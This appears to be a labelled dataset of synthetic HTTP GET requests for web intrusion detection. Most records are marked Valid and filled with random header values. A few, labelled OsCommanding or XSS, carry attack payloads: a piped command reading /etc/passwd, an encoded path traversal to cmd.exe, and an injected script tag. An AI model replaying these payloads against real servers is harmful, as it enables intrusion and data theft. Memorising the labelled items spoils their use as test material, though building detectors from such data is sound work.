If-Range: Sun, 04 Apr 04 14:19:24 CET
Max-Forwards: 0
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM b2x0dWxyYnp0Z2JpbG9hdG9wdGFuaGhhYnRlb2F5ZW5hNXRw
Range: -896,61-724379,-171
Referer: /oo9n/onr40hi/ctlmsae/npwnr.php3
TE: chunked
Trailer: Authorization
User-Agent: Qseio1eha0vpan
UA-CPU: 68000
UA-Disp: 903,743,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8091x908
Via: 3.7 161.84.83.201:464
Transfer-Encoding: deflate
Upgrade: 40r/4.7, mrf/3.7
Warning: 507 147.216.24.122 "tsXo1ea" "Wed, 04 Jun 08 11:36:12 UTC"
X-Forwarded-For: 92.6.156.80
X-Serial-Number: 36796003300
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20442
Start - Id: 28820
class: Valid
GET /sJQwVVusioeJr-RE6/hVyzFKW4z/8git8wstCP3e/kA5W.A4PGGP/suHicKbaaralr/Yd@evallZIrqEX/t-XIHJXVDSN/umedlyezvmtrb7p1hi/ey7..aspx?1ihitesoac=group+bysr+9jo8logddivt+wk+%2F&ne3eeo1relbs=93&tnTr6etdpf=hdws81&oea=21523&oexgEiktnbenh0h=573568&eOTP8JMQJ@=c1g-Lf2jLG&7lopiieaabhi=765083&NahAdOhs=UJse5hH&ipntqjisltNi=s&ediN1p=7&Bc@pf=l+p&gDoEiEe=deleteh1thttps HTTP/1.0
Host: 170.56.86.94
Connection: teieuhe
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.5
Accept-Language: yo-ubb, 1Ha-seii4d;q=0.6, t-b0saa;q=0.5, sLgsoi-lbbv
Cache-Control: max-age=1
Client-ip: 194.145.216.143
Cookie: iOeac=ytshieaCtknodesrtmpltcrn~;nraQb0tttmi5i5=27;cnoin1Eteestry=bdeeoQfhten;au=0499;ettteuaOh8=504430
Cookie2: $Version="138"
Date: Sun, 22 Mar 09 23:11:48 GMT
ETag: W/"D-LFA3Yi1z1Rsvxri"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Thu, 12 May 05 20:53:23 UTC
If-Unmodified-Since: Thu, 20 Sep 07 05:59:24 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 02 Dec 09 08:18:35 CET
Max-Forwards: 2049
MIME-Version: 3.0
Pragma: bnmwanl=nsNEd
Proxy-Authorization: hdae faMstat=0egsty
Authorization: aw9sl rstdN=eoefudur
Range: -655480,928-436
Referer: /s7ocs.msf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.3 (Machintosh; U; Mac OS X 5.9; tN-vT; rv:3.5.6) Gecko/71047548
UA-CPU: 68000
UA-Disp: 587,522,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 405x937
Via: HTTP/6.3 www.7deihph.html:04
Transfer-Encoding: Rmidss; cn521eth=ydNpn
Upgrade: dma/7.4, st8cs/3.2, ehL/8.4, tDaep/0.4
Warning: 591 www.2iae.css "moahvhy6y9oI" "Fri, 27 Jul 07 17:55:14 GMT"
X-Forwarded-For: 26.164.27.111
X-Serial-Number: 39502
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28820
Start - Id: 23457
class: Valid
GET /oy/daroh0nbdu/a8iCgqGzwoQrHU6b/e@7mtgBbSwDjXl@TZAsA/ZH3/atihnaol.jpg? HTTP/1.0
Host: www.htbehe.it
Connection: close
Accept: text/xml
Accept-Charset: iso-8859-6, iso-8859-2
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=334
Client-ip: 146.86.154.88
Cookie: bFQ_sWqTM=9531;rpR=Sahutfe;qladae8axr=6iAhueed
Cookie2: $Version="551"
Date: Sun, 29 Jan 06 23:16:47 CET
ETag: W/"-fuUBF2aEQBbYVph"
Expect: uSYiP=neeo;honDikht
From: tocfie@tta6.cz
If-Modified-Since: Sat, 26 Dec 09 02:54:16 UTC
If-Unmodified-Since: Sun, 08 Jul 07 15:21:17 CET
If-Match: "BhT.ph7KI3kds-2TT"
If-None-Match: *
If-Range: Thu, 15 Oct 09 02:00:45 UTC
Max-Forwards: 5662
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM b2F0cHVpaWZzbGE0YXNkdDRQSG1lbm5oaGcyZXdzRGV6dHRSYTlybDNydG9ueTY=
Authorization: Digest algorithm=MD5
Range: 19-29961,-41
Referer: http://www.sUcjamcr.net/tu8e/rml7.tar
TE: trailers
Trailer: From
User-Agent: Mozilla/9.8 (Machintosh; U; PPC Mac OS X 1.4; en-Gq; rv:1.9.1) Gecko/30610766
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 543x2792
Via: 2.0 56.6.151.42, atn/1.9 103.35.149.102
Transfer-Encoding: deflate
Upgrade: roe/8.9, root/1.9
Warning: 683 www.fFdgenep.jpeg "pNdodrhDroeousrSreo" "Mon, 16 May 05 21:27:45 GMT"
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 5183522523
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23457
Start - Id: 26389
class: Valid
GET /MTSnode/s2GGCqz8Z.4rldDJVHz1/uF/ptreatsAUmnonxeto/eBkoqKt8lK9ZAiDc/a1/aJkk0HVFGpP1/pY6/qfa/tueAw0rpsie/3xEd@.php3?Y@tkH=ge5Tqwwdnsdtdtncco&wstchsUnzu3=7deya&copyzestelnetQYgp4nfrom=nDn_MvVw267B&em1E=icerz&y4snsdfte=lKeOcyo HTTP/1.1
Host: 125.144.240.182
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-chinesesimp;q=0.5
Accept-Encoding: gzip, gzip;q=0.2
Accept-Language: 6-me, aia-ot, a-d, brisgwot-lRepts6a;q=0.5
Cache-Control: no-cache
Client-ip: 250.76.61.234
Cookie: arsMacu=o;tlll3yp=54049361
Cookie2: $Version="05"
Date: Wed, 06 Jan 10 11:52:57 GMT
ETag: W/"lxOd-IIVqXV7vkQNfO"
Expect: 6i3uniit
From: 8u9Mo@enowovqeu.com
If-Modified-Since: Fri, 08 May 09 06:43:52 CET
If-Unmodified-Since: Wed, 04 Jan 06 24:24:50 UTC
If-Match: "Qh2DauFmPgJdr4D"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 8.2
Pragma: wa=si
Proxy-Authorization: Digest cnonce="hehs"
Authorization: Basic YW5vYVRJYXM6bHJuYQ==
Range: -954249,93-21781,60217-
Referer: /ehzrreit/ae5t/fhTaw2/Eer5a/fmdeoi.mdb
TE: trailers,deflate;q=0.6
Trailer: Pragma
User-Agent: Mozilla/2.7 (Windows; U; Win98 6.3; dl-7o; rv:7.5.1) Gecko/34488316
UA-CPU: StrongARM
UA-Disp: 146,5965,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5346x326
Via: 2.8 www.ehAe7few.js
Transfer-Encoding: gzip
Upgrade: Yoanr/1.5, vNn/4.7, 7loa/0.1, nab9I/9.9, ale/2.7
Warning: 235 www.erEt.html "t7TisoawNBaorq" 
X-Forwarded-For: 21.229.165.135
X-Serial-Number: 7631325909856
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26389
Start - Id: 11015
class: Valid
GET /8ei/sm/kwindow.openwzE-q62YwinntE/sacsaiicinRmbiF/se/8tYeCqW69G/0cnwiframexwindow.openX4r/tbot/ma@.gif?eihxggltftctee=eSReopen%5Dfao&EAOC=5gAho&ita0=fhsncte&er4eejTwthoie=7MoTJzN&v1nnwel=je79%24+wsle%40tehe%2But%5D&antcleo=091&eaTE=Tom8eu%29%5Cdts HTTP/1.0
Host: 48.155.201.194:88
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.0, deflate;q=0.4, gzip, deflate;q=0.2, deflate;q=0.1
Accept-Language: tssl-ulodoe
Cache-Control: no-transform
Client-ip: 102.97.73.215
Cookie: 6tdeiR8leFspae=eteitoan0lno
Cookie2: $Version="752"
Date: Mon, 01 May 06 21:27:46 CET
ETag: "9zaHIlbRk0sS1PMR"
Expect: ihph
From: aewoeu@ihehwo.net
If-Modified-Since: Tue, 20 Dec 05 23:39:01 UTC
If-Unmodified-Since: Sat, 07 Apr 07 19:47:44 CET
If-Match: "z.iEbjSN8Xu9x-CtHo4Q"
If-None-Match: "fr1orGa8wBeMaYzy0"
If-Range: "l-S6yqdjrR@5prS8"
Max-Forwards: 8
MIME-Version: 5.8
Pragma: h43Ymlla='vta'
Proxy-Authorization: Digest realm
Authorization: NTLM c3dlbG1pMWVvdUF0aGNnZmxkZXdlcnRlZTNsaGFyOHVpbTNuZWVkaVNBMw==
Range: 088577-,4710-50
Referer: /coes5fhs.css
TE: gzip,trailers,trailers
Trailer: Date
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 8.3; ih-xn; rv:5.6.8) Gecko/82299415
UA-CPU: x86
UA-Disp: 618,722,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 124x705
Via: HTTP/6.5 www.escO.jpg
Transfer-Encoding: deflate
Upgrade: tcIpeq/7.0, eetrco/8.3, lhnoln/1.8, 1guo/9.9
Warning: 404 55.233.111.251 "hwzpimntn" 
X-Forwarded-For: 187.124.141.113
X-Serial-Number: 109708230731
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11015
Start - Id: 19683
class: Valid
GET /nota5I6i/RsP0echoYperldieAsBD/hWKTuElVB_WW/y3f6W/nphpgGbRx@2Ij/0dcbywpt/lWol11/tbT7odaZfc.asmx?VfeZ1YE=6dnrnetcattOo%2F&5v8nwinntrDIlp=tU6t1oagu&ievki5okhu=nhnry&Mxslieo=tEn_3HDXIIP&sptoupf=adeoee+5&ro=74&fc9ueUeedn=n&ayosaafhs2mao1=3161845 HTTP/1.1
Host: 131.37.35.194
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-8-i;q=0.9, windows-1251;q=0.8
Accept-Encoding: identity
Accept-Language: hTttn7-tB, t-gn1tdcg, rolr4nc-hedhN;q=0.4, vS-hE;q=0.5
Cache-Control: only-if-cached
Client-ip: 87.23.249.148
Cookie: dxnm=gWJXhYzzl;yparhilbeaxb8ey=71985;nn7t7n3rquLj=6060;YSpNJJuvkbbine=99252433;autoexecSshutdownK=includeDxuiraoOyMs;yg4a@=1ttbhiframeadxo0;i n
Cookie2: $Version="9"
Date: Mon, 12 Sep 05 19:57:53 CET
ETag: "O90S3RZvs0iyNJ3TSa6"
Expect: 100-continue
From: moea@estmzx.uk
If-Modified-Since: Thu, 17 Jul 08 09:31:02 UTC
If-Unmodified-Since: Mon, 02 Mar 09 15:13:36 UTC
If-Match: *
If-None-Match: "u.sw4eaffbm07UM3"
If-Range: Fri, 07 Dec 07 24:50:03 GMT
Max-Forwards: 21
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: wncf sZiI=mapeesi
Authorization: Basic ZXVsYTloZTE6OXJudA==
Range: 921246-43
Referer: /4trmp/audrao/ayibWnyo/epmh/Nebor.nsf
TE: deflate,gzip;q=0.7
Trailer: Host
User-Agent: Mozilla/6.6 (X11; U; Linux i586 0.1; 3n-eb; rv:5.6.1) Gecko/63524494
UA-CPU: MIPS
UA-Disp: 8275,864,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 246x7710
Via: teePsn/5.0 www.nnh0cc.png, e1ilr/0.0 www.oPra.htm:6, 5.7 www.toWhos.js
Transfer-Encoding: gzip
Upgrade: leeo/7.8, ciiam/4.0, wtx/5.6, u8e/9.4
Warning: 503 www.hesa5ol.html:9360 "rpo78l" "Thu, 30 Jun 05 14:07:38 UTC"
X-Forwarded-For: 152.55.56.249
X-Serial-Number: 7592797493312
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19683
Start - Id: 8998
class: Valid
GET /w3aNNI/gUTb7xcFNo36Qjna8AhW/ezlrmurt/gVFZQTkdqe1S.jsp? HTTP/1.1
Host: 56.222.156.203
Connection: 9icte
Accept: image/gif;q=0.3, text/html;q=0.5, video/quicktime;q=0.1
Accept-Charset: windows-1252, windows-1255;q=0.5, iso-8859-4, iso-8859-4;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=9363
Client-ip: 154.166.247.14
Cookie: 40jsys=dOpm0IGFl48;aEaolzfciwu= l;whem=z_H_9ECvw@PE
Cookie2: $Version="498"
Date: Sat, 24 Jan 04 06:00:01 CET
ETag: W/"NukhYPLDw3ZvLlW9SW0"
Expect: qyred=rf7reh
From: lstucdNi@eei2smta.net
If-Modified-Since: Tue, 11 Apr 06 08:48:13 CET
If-Unmodified-Since: Wed, 23 Apr 08 12:07:36 GMT
If-Match: "13_1JDwCXrQmyFTG0"
If-None-Match: "-yZ__x8Lx.y-mwU3B0"
If-Range: Sun, 09 Aug 09 23:00:00 GMT
Max-Forwards: 13
MIME-Version: 0.3
Pragma: r='isicm185'
Proxy-Authorization: lsSh2 t9tteeo=y7a2ree
Authorization: NTLM YmdVTG9pdGFpdjhyY29UY2xlc2dIMjlsNGhlcmhvZWl0YVY5dGhpMHJtY25IbVI=
Range: 083-
Referer: http://muliUuta.be/clex/toEbsta.pdf
TE: trailers
Trailer: Trailer
User-Agent: d2s4ps (sjdAh7v)
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7350x9086
Via: 6.9 www.Ae8iti.html, HTTP/6.0 www.todm3.js
Transfer-Encoding: compress
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 114 229.97.82.158 "dfowts0fhBAttx4ok5ey" 
X-Forwarded-For: 253.252.174.31
X-Serial-Number: 92954758156
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8998
Start - Id: 11484
class: Valid
GET /iot6j905a0Redk/eXNavIWs7e0ejSVI2h/linkQ/sI5vntAliBUv/0xhd1LFn/9nridluydisqss/eoarSn9sajt6n.cgi? HTTP/1.0
Host: www.rjejhak.cz:09
Connection: tiu3s
Accept: audio/*;q=0.7, video/mpeg;q=0.2, image/*
Accept-Charset: iso-10646-ucs-2;q=0.6, x-mac-roman;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 170.41.229.75
Cookie: 2xp_kWMO=994311;60oRo=pokg8teeats;awhedeqoe=r
Cookie2: $Version="2"
Date: Fri, 15 Oct 04 18:42:38 UTC
ETag: "-3tmvwHH0fIma2usr84"
Expect: 100-continue
From: oohw@halud.org
If-Modified-Since: Mon, 23 Feb 04 06:48:19 CET
If-Unmodified-Since: Tue, 15 Nov 05 03:43:02 UTC
If-Match: "owFeHGAgA5fuQwiH2qSi"
If-None-Match: *
If-Range: *
Max-Forwards: 481
MIME-Version: 6.0
Pragma: Zichheh='toj'
Proxy-Authorization: Digest qop=ki3naiu
Authorization: NTLM aXM1dHRldWlhaXl1c210aE5pN1RlRW5zVGQyZTE0b0Vkb2VoZTV1
Range: -517746,13-
Referer: http://www.refS.com/ieEoid/smxo0908.cgi
TE: deflate;q=0.8
Trailer: From
User-Agent: jRYuvz4Y http://www.ternndo.cz
UA-CPU: 68000
UA-Disp: 9055,045,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9366x217
Via: nt6/1.5 20.236.131.97, 0.0 www.kusw.htm:2741, 3.0 12.118.206.209
Transfer-Encoding: identity
Upgrade: ssb/3.4, dhoi/2.7, Ha2qy/1.5
Warning: 532 www.guwhhej.jpeg "fEoeeynUyaan2" "Sat, 12 Apr 08 24:22:20 UTC"
X-Forwarded-For: 93.142.43.86
X-Serial-Number: 684447475496
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11484
Start - Id: 43333
class: OsCommanding
GET /sRk@n/itOLd/eTdRniMct/MHADdocumentWr9y6include@vO/6olo.jpeg?Iiaritgxehe=%7C++++%2Fbin%2Fcat+++++%2Fetc%2Fpasswd%2500.html HTTP/1.1
Host: www.etoariaos7.com
Connection: oool2
Accept: text/html
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.4, deflate;q=0.6, identity, deflate;q=0.7
Accept-Language: Sls8nl-toeiap;q=0.6, nwsh-nstt6
Cache-Control: max-age=0289
Client-ip: 72.77.48.25
Cookie: leaXEn=-7;SfasooVhriel=frtcoOErh5radmeo;ievr=755535
Cookie2: $Version="4"
Date: Tue, 10 Jul 07 14:54:03 CET
ETag: "21fLlo7mOtYun2Bj1tw"
Expect: 100-continue
From: aDiswue@0eroLdeg.uk
If-Modified-Since: Wed, 05 Jan 05 14:56:12 UTC
If-Unmodified-Since: Mon, 30 Apr 07 12:24:45 UTC
If-Match: "QDudGyhtxZRU1XGDm"
If-None-Match: *
If-Range: Thu, 03 May 07 08:33:34 CET
Max-Forwards: 16
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM Y05pc3B3bmVpa3dlclBhOGFubWxlY296cmlkbmdTaWFyeWVjeWlp
Authorization: ag8p erfo=loon
Range: -3
Referer: http://ettobic.it/ttia/neuGlnw/iel6iim/i9eTsi/t4aerdpo.cfm
TE: trailers
Trailer: Via
User-Agent: Mozilla/5.1 (X11; U; Solaris 9.0; 09-Ri; rv:0.7.4) Gecko/49763542
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4509x153
Via: 2.7 234.49.214.176, 8.2 www.vir8g.css
Transfer-Encoding: deflate
Upgrade: EC4/0.8, cEeq/4.6, ezga1/4.0, sop/3.8, d63oen/6.6
Warning: 736 www.zmeftdme.shtml:69 "oNaciecieersUyiosal" 
X-Forwarded-For: 115.149.203.202
X-Serial-Number: 100296896076
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43333
Start - Id: 44018
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.mv5n.biz
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish;q=0.0, cp-932, x-mac-ce;q=0.7
Accept-Encoding: 
Accept-Language: j5tecrw-ah7Ae8p, n-np3, trn1pat-b24;q=0.6
Cache-Control: max-stale
Client-ip: 78.141.142.69
Cookie: sllodeh7hDsg=t_R-;ereSabreSo4s7NE=nia'Chtpass?ohttps(s;eb1loRurt=g\e;n25grdOorfn=o oo\gg9oIn3alunion;eeO2Wtejs4yOqna=hqR
Cookie2: $Version="5"
Date: Mon, 08 Mar 10 08:09:03 GMT
ETag: "afS5RErKT8MdXnD1pWsB"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 30 Dec 08 21:49:23 UTC
If-Unmodified-Since: Sat, 24 Oct 09 15:50:48 GMT
If-Match: "k3OU0kBy1dz-tyR@"
If-None-Match: "65GUz-dRH2ZQUeIbRsT1"
If-Range: *
Max-Forwards: 3297
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM aXNEZnNoaXNvYTBkZjFwdG5hc25xY2dBdGN0dGhzNE5ldWluZmxwTw==
Authorization: rpirso 5hnrkEa=t0ebst
Range: 67-764741,470518-20,3-202913
Referer: /ho9ya.msf
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: tnzRazfIo (zlA4739HCc; y3nHjEO; 2Kd6B.MY4g; oyrQO_LY; sY_Fi5)
UA-CPU: PowerPC
UA-Disp: 675,1960,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: HTTP/0.2 4.200.156.34:8505
Transfer-Encoding: identity
Upgrade: t8se4/9.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44018
Start - Id: 26707
class: Valid
GET /aS9i2uEN5rMqYDC/qeenhDaee0ogho.gif?sait=betweeneMr5maday%7E+&3cKU84JDfs=6aewcrem&iddsLng=jqpraf&gi=160&dl1oEhEs4hhi=asxp_7reaiT8Gg HTTP/1.1
Host: 29.203.173.166
Connection: atadpsdn
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.3, compress;q=0.7, deflate, identity;q=0.4, deflate;q=0.9
Accept-Language: *;q=0.9
Cache-Control: iofuht=mt7ulno
Client-ip: 41.69.153.49
Cookie: crg6S_libFtHl=v9txtermhome tusdrradrop+ dstO;iaysN=il50h_fa-0
Cookie2: $Version="00"
Date: Wed, 15 Nov 06 13:37:02 CET
ETag: "T8@J8mWCMvFmLewuG"
Expect: 100-continue
From: erpEn@cctbogs3k.biz
If-Modified-Since: Sun, 18 Sep 05 18:01:33 GMT
If-Unmodified-Since: Tue, 08 Feb 05 16:05:31 CET
If-Match: "WP4fES9WKIv0kLYF3oM"
If-None-Match: *
If-Range: Mon, 16 Oct 06 23:10:49 GMT
Max-Forwards: 37
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Xtgt8g gueh9=jopucso
Authorization: btporI teCo=uain
Range: -33274,02764-,88-035
Referer: http://www.tczeae.ch/tscnDkr.wav
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.6 (Windows; U; Win98 6.7; az-st; rv:8.3.8) Gecko/13129782
UA-CPU: 68000
UA-Disp: 221,658,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 231x546
Via: 7.4 11.171.211.237:0, 5.9 151.50.202.70:96642
Transfer-Encoding: gzip
Upgrade: xu4y/7.3, 8gru8/4.9, iehAs/2.8, a3va/9.5, cwa/8.5
Warning: 073 www.moiongc.htm "daoe" 
X-Forwarded-For: 241.3.2.199
X-Serial-Number: 838236
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26707
Start - Id: 20824
class: Valid
GET /uo/tH/sto0dhib1btsgwcR/3LQgiByuo2dxP.jpg?oyisfislr1wH2e=449990&tic0drayi7iwi9=txme7uerG&ezRIKA8=gegfeTassn5cer%3A+Es&7IwtbetweenFw7passthru1tE=rskAuete+4l&aanmsrO=edts%5DEhsinc3nnd&asrrSes0oLdyxne=%7EL%5Bhi&Rentoo6gesne=t8sgz9&Ie4AVCxmlW=11107 HTTP/1.0
Host: www.iTsju.st
Connection: hnel
Accept: */*;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: al0e5iia-estna, nny7-h;q=0.1, neu-nodirAr;q=0.3, 83ebeo-ltr;q=0.5
Cache-Control: no-transform
Client-ip: 69.221.101.250
Cookie: 7lsJ@NEFOO2lW=a:;an3uldi=rcRyyA9
Cookie2: $Version="915"
Date: Mon, 16 Mar 09 24:15:50 CET
ETag: W/"DeYc6lmQl-YJGqzsxV"
Expect: nmao=teaea;oidrhia
From: itbAy3@24cao.it
If-Modified-Since: Fri, 15 Sep 06 07:44:39 UTC
If-Unmodified-Since: Sat, 26 Feb 05 23:22:23 CET
If-Match: "-GnloiBoNd9sfLY7fW9B"
If-None-Match: "oTGFDx.Kbut8wU@8v"
If-Range: Thu, 14 Dec 06 23:54:51 CET
Max-Forwards: 7463
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: oCeaVw h5ecsw=ezyieu
Authorization: xnem eahs=0nmz
Range: 72115-,9-3120,919774-69202
Referer: http://trEi1.it/nsnlz/p8n7epl/cnqoa/iEeeaf/ayNpc.shtml
TE: trailers,deflate
Trailer: Via
User-Agent: oleoez3rro1ert
UA-CPU: PowerPC
UA-Disp: 7276,7233,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3856x4150
Via: FTP/2.5 236.234.176.36
Transfer-Encoding: identity
Upgrade: nfoEet/4.4, cNiaOe/9.4
Warning: 765 186.65.136.9 "kes3cga1t4maesoo" "Mon, 23 Nov 09 01:50:54 CET"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20824
Start - Id: 29760
class: Valid
GET /mJASUbBIadminh/a@wzywjNhrmVrmeA/e7stNnayoiuieeoeact/0bmuY6hpsy/tx4sisn8nrhqn9g9ry/mqnbaEdcybdJn.png? HTTP/1.0
Host: 230.99.17.183
Connection: close
Accept: video/mpeg;q=0.3, video/quicktime;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.7
Cache-Control: av=M
Client-ip: 175.124.156.50
Cookie: rteQhee=Hmg~kunionpositionnseshutdown;sh4uce7eeliy='te
Cookie2: $Version="66"
Date: Fri, 15 Feb 08 05:38:20 CET
ETag: W/"AybKivuz6vrGDh10JTrV"
Expect: lehLi
From: apnm@hnhwooJMi.gov
If-Modified-Since: Mon, 23 Feb 04 09:14:47 GMT
If-Unmodified-Since: Fri, 07 Nov 08 08:23:39 CET
If-Match: "wGg4B-tJIK24km3mgj"
If-None-Match: *
If-Range: *
Max-Forwards: 993
MIME-Version: 3.4
Pragma: S3r='aenoat'
Proxy-Authorization: Ugaojh ovcg=gigisa
Authorization: Digest nonce
Range: 544462-8615
Referer: http://www.nrrtsn8.biz/eslwe1ro/e1si.wmn
TE: trailers,chunked;q=0.7
Trailer: Warning
User-Agent: ecuylHlcn/6.3.3.7.4
UA-CPU: MIPS
UA-Disp: 045,174,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2347x796
Via: eil/5.7 61.243.26.10, 8.3 www.f8ceoine.gif, HTTP/6.7 www.ca57.jpg
Transfer-Encoding: gzip
Upgrade: i9y/2.0, idocae/0.1, xaekJa/4.4
Warning: 764 www.9roigr.gif:83 "HTlfn3ttd2atdvow" 
X-Forwarded-For: 150.107.9.100
X-Serial-Number: 55789
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29760
Start - Id: 47586
class: XSS
GET /Huf/mxMUAgJKZtQ/xO.nsf?anmcoktramkrr=lps%26i%27&sthmObsOahwb=680506&qu=7554506&Jmc2J_R=X+lesmochay%2Fqcp&iins2dn8btl=ibt%25rmoaym&eqoszeiihr=iBx-W.6qGB&Genhe=14&ioano9Cdpoe=600859117&tqkxafnLibwytom=oeeh&0s@S8sH=nhi%3Ee&-_TTmb5E=pu%28jamyifem&uelhHsaf5ssi=%3C%21--+--+--%3E%3Cscript%3E%5Balert+++%28%27dGirwizI%27%29%3B%5D%3C%2Fscript%3E%3C%21--+--+--%3E&6timpetre=Lnmvct8tlniedNn&tttranerunnhcin=zn HTTP/1.1
Host: www.oubmreeaso.be:300
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.9, iso-8859-9;q=0.0, koi8
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 70.88.29.191
Cookie: uaIz=o;oAdciyosolujve=s7i7FFT89;mkc=passwdn
Cookie2: $Version="4"
Date: Wed, 30 Dec 09 20:02:02 CET
ETag: W/"ykYpVFv4o2eRsz_1U"
Expect: 100-continue
From: i5nNat@viikl.cz
If-Modified-Since: Fri, 19 Jun 09 01:51:24 UTC
If-Unmodified-Since: Mon, 31 Aug 09 23:36:34 CET
If-Match: *
If-None-Match: "NdR7AF0p89vmqDIw"
If-Range: *
Max-Forwards: 71
MIME-Version: 6.6
Pragma: wdtIulo='ce'
Proxy-Authorization: Digest qop=m2ta
Authorization: Digest realm
Range: 849916-
Referer: http://ancc.cz/NGiAehu/yrnoeo55/rdt3d.asmx
TE: chunked,chunked;q=0.7,trailers
Trailer: If-None-Match
User-Agent: e9wwuro/7.9.3.1.1
UA-CPU: StrongARM
UA-Disp: 2757,1725,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 924x017
Via: 8.0 179.60.33.156:19, HTTP/7.5 www.mJtbne.png:467
Transfer-Encoding: gzip
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 691 91.163.92.153 "daitswr4lqZadnb" 
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47586
Start - Id: 3367
class: Valid
GET /s-.mspx? HTTP/1.0
Host: www.esuruTe.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: qrOa-eGaric, A-E0;q=0.2, crdHn-fErpiz;q=0.8
Cache-Control: max-stale=3
Client-ip: 241.173.41.168
Cookie: ZFm1Hl=863;hmptsi=rurp
Cookie2: $Version="792"
Date: Sun, 29 Jun 08 09:02:39 UTC
ETag: W/"Wuorz4v88C6@85w"
Expect: nnr46=hUivsnge
From: mEt7Rt@xbaiymu.st
If-Modified-Since: Tue, 19 Dec 06 08:38:18 GMT
If-Unmodified-Since: Sun, 20 Nov 05 14:40:11 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 26 Sep 09 14:47:49 UTC
Max-Forwards: 370
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM YU9OZ2V4Nm5wb3NpdHN0bDZvaTh3ZW1lYW9lYWh2dHNydA==
